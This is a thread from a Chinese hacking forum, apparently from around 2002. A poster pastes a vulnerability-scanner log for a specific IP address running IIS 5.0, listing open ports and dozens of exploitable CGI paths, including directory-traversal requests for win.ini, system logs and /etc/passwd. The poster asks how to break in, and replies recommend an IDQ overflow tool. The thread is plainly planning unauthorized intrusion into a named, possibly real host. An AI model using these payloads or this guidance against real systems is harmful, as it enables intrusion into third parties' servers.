20CN网络安全小组论坛 - 菜鸟乐园 - CGI漏洞!!!!!!!!!!!!!!!!!!

论坛: 菜鸟乐园标题: CGI漏洞!!!!!!!!!!!!!!!!!!

作者: sunking [sunking]

论坛用户

210.82.164.73
探测主机：210.82.164.73
服务检测 HTTP-> Microsoft-IIS/5.0
检测 Port-> 210.82.164.73 端口 135 [epmap] 开放 ...OK
检测 Port-> 210.82.164.73 端口 80 [http] 开放 ...OK
检测 Port-> 210.82.164.73 端口 443 [https] 开放 ...OK
检测 Port-> 210.82.164.73 端口 139 [netbios-ssn] 开放 ...OK
发现NULL.printer漏洞-> 210.82.164.73 IIS5.0 NULL.printer Exploit ...OK
发现CGI漏洞-> 210.82.164.73/*.ida (200)...OK
发现CGI漏洞-> 210.82.164.73/*.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/?PageServices (200)...OK
发现CGI漏洞-> 210.82.164.73/."./."./winnt/win.ini%20.php3 (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full (200)...OK
发现CGI漏洞-> 210.82.164.73/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-cs-dump (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-start-ver (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-html-rend (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-stop-ver (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-uncheckout (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-usr-prop (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-ver-diff (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-verify-link (200)...OK
发现CGI漏洞-> 210.82.164.73/?wp-ver-info (200)...OK
发现CGI漏洞-> 210.82.164.73/abczxv.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/blabla.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/iishelp/iis/misc/iirturnh.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/exair/search/query.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/exair/search/qfullhit.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/exair/search/qsumrhit.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/exair/search/search.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/issamples/fastq.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/issamples/oop/qfullhit.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/issamples/oop/qsumrhit.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/iissamples/issamples/query.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/scripts/samples/search/author.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/scripts/samples/search/filesize.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/scripts/samples/search/filetime.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/scripts/samples/search/qfullhit.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/scripts/samples/search/qsumrhit.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/scripts/samples/search/query.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/scripts/samples/search/queryhit.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/scripts/samples/search/simple.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/null.htw (200)...OK
发现CGI漏洞-> 210.82.164.73/prxdocs/misc/prxrch.idq (200)...OK
发现CGI漏洞-> 210.82.164.73/piranha/secure/passwd.php3 (200)...OK
发现CGI漏洞-> 210.82.164.73/acid/acid_main.php (200)...OK
发现CGI漏洞-> 210.82.164.73/admin.php3?admin=anything (200)...OK
发现CGI漏洞-> 210.82.164.73/admin/ (200)...OK
发现CGI漏洞-> 210.82.164.73/banners.php?op=Change (200)...OK
发现CGI漏洞-> 210.82.164.73/forum/common.php (200)...OK
发现CGI漏洞-> 210.82.164.73/index.php3?vhosts[test]= (200)...OK
发现CGI漏洞-> 210.82.164.73/phorum/common.php (200)...OK
发现CGI漏洞-> 210.82.164.73/opendir.php?requesturl=/etc/passwd (200)...OK
发现CGI漏洞-> 210.82.164.73/phpgroupware/inc/phpgwapi/phpgw.inc.php (200)...OK
发现CGI漏洞-> 210.82.164.73/phpPhotoAlbum/explorer.php (200)...OK
发现CGI漏洞-> 210.82.164.73/submit.php?CONF=anything (200)...OK

谁能告诉我从什么地方下手@@@@@@@@@@@@@@我试了半天都不行,而且没有共享..谁能告诉我怎么下手啊@@@@不会是从139开始吧

地主发表时间: 11/08 02:15

回复: hacker521 [hacker521]

论坛用户

哇，IDQ和IDA溢出你就赚死了，可以用IISIDQ去把他溢出

B1层发表时间: 11/08 06:51

回复: sunking [sunking]

论坛用户

可以具体点吗？俺菜啊

B2层发表时间: 11/09 15:17

回复: jwm3336 [jwm3336]

论坛用户

去网上找找!
哈哈!
你发了!!!!!!!!!!!!

B3层发表时间: 11/09 15:21

回复: hacker521 [hacker521]

论坛用户

你去找些2002年的黑客杂志，里面肯定有详尽介绍，如果你找不到，可以去翻翻以前关于CGI漏洞入侵的帖子，里面我写过详细的入侵方法

B4层发表时间: 11/09 17:33

论坛: 菜鸟乐园